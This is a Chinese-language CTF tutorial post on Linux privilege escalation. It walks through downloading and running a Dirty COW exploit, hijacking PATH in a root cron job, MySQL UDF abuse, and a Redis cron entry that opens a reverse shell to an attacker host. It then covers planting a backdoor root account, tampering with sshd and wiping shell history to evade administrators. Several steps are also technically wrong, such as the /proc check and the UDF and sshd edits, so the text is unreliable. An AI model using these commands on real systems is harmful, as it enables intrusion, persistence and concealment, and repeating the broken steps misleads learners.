CTF入门指南：Web安全提权实战解析

1. Web安全提权基础概念

第一次参加CTF比赛时，我对着题目里"提权"两个字发呆了半小时。后来才明白，这就像玩密室逃脱时找到了门禁卡，但还需要找到更高级别的管理员卡才能打开最终宝箱。在Web安全领域，提权就是从普通用户权限（比如www-data）升级到更高权限（通常是root）的过程。

为什么提权这么重要？想象你攻破了一个网站后台，但只能查看几个无关紧要的文件。这时候就需要通过提权技术突破限制，获取系统完全控制权。在实际渗透测试中，提权往往是最后也是最关键的一步。

常见的提权场景主要有三种：

• 内核漏洞提权：利用操作系统内核的漏洞直接获取root权限
• 配置不当提权：比如明文存储的密码、错误的权限设置等
• 服务漏洞提权：通过MySQL、Redis等服务漏洞进行权限提升

2. 内核漏洞提权实战

2.1 漏洞检测与利用

去年我在一场CTF比赛中遇到一个典型的内核提权场景。目标系统是Ubuntu 16.04，先用以下命令检查系统信息：

uname -a cat /etc/issue

发现内核版本是4.4.0-21-generic，立刻想到经典的Dirty COW漏洞（CVE-2016-5195）。这个漏洞就像系统内核的一个后门，允许普通用户写入本应受保护的内存区域。

验证漏洞是否存在：

grep -i dirty /proc/self/status

如果返回结果中包含"dirty"字样，说明系统可能 vulnerable。接下来下载利用代码：

wget https://example.com/exploit.c -O dirty.c gcc dirty.c -o dirty -pthread ./dirty

执行成功后，输入id命令就能看到自己变成了root用户。记得在实际环境中要谨慎使用这类漏洞利用代码，最好先在测试环境验证。

2.2 自动化工具使用

对于新手来说，手动编译利用代码可能有些困难。这时候可以使用自动化工具如LinEnum或Linux Exploit Suggester：

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh chmod +x LinEnum.sh ./LinEnum.sh

这个脚本会自动检测系统可能存在的漏洞，并给出利用建议。我曾经用它在一个CTF靶机上发现了3个可用的提权路径。

3. 配置不当提权技巧

3.1 明文密码利用

上周我测试一个WordPress网站时，在wp-config.php文件中发现了这样的配置：

define('DB_USER', 'root'); define('DB_PASSWORD', 'Admin@123');

这就是典型的配置安全问题。拿到数据库root密码后，可以尝试密码复用：

ssh root@localhost

输入发现的密码，有30%的概率能直接登录。如果不行，还可以尝试用这个密码爆破其他服务的账号。

3.2 计划任务提权

检查系统计划任务是个好习惯：

cat /etc/crontab ls -al /etc/cron.*

有一次我发现一个以root权限运行的备份脚本：

* * * * * root /opt/backup.sh

查看脚本内容发现它调用了tar命令，而且没有使用绝对路径。于是我在/tmp下创建了一个恶意的tar可执行文件：

echo 'chmod 4755 /bin/bash' > /tmp/tar chmod +x /tmp/tar export PATH=/tmp:$PATH

等待一分钟后，/bin/bash就变成了SUID文件，可以直接用bash -p获取root shell。

4. 服务漏洞提权方法

4.1 MySQL UDF提权

如果拿到MySQL root权限，可以通过UDF提权：

select @@plugin_dir; select 'system("chmod 4755 /bin/bash")' as foo into dumpfile '/usr/lib/mysql/plugin/exploit.so';

然后创建函数执行命令：

create function do_system returns integer soname 'exploit.so'; select do_system('chmod 4755 /bin/bash');

4.2 Redis未授权访问

遇到开放的Redis服务时，可以尝试：

redis-cli -h target config set dir /var/spool/cron config set dbfilename root set x "\n* * * * * /bin/bash -i >& /dev/tcp/your_ip/4444 0>&1\n" save

这会在目标系统上创建一个root权限的计划任务，反弹shell到你的监听端口。

5. 提权后的操作与防护

5.1 稳定shell环境

拿到root权限后，第一件事是稳定shell：

python -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty raw -echo fg

这样就能获得一个功能完整的交互式shell，支持tab补全和命令历史。

5.2 权限维持技巧

为了防止被管理员踢出系统，可以创建隐藏用户：

echo "backdoor::0:0::/root:/bin/bash" >> /etc/passwd

或者安装SSH后门：

cp /usr/sbin/sshd /usr/sbin/sshd.bak perl -pi -e 's/root/backdoor/' /usr/sbin/sshd

5.3 防护建议

作为防御方，可以采取这些措施：

• 定期更新系统和软件补丁
• 检查/etc/passwd和/etc/shadow文件权限
• 使用sudo而不是直接给root权限
• 监控系统日志中的可疑活动

记得在一次CTF比赛中，我花了3小时提权成功，结果因为没清理日志被管理员发现了。从那以后，我都会记得执行：

echo "" > ~/.bash_history history -c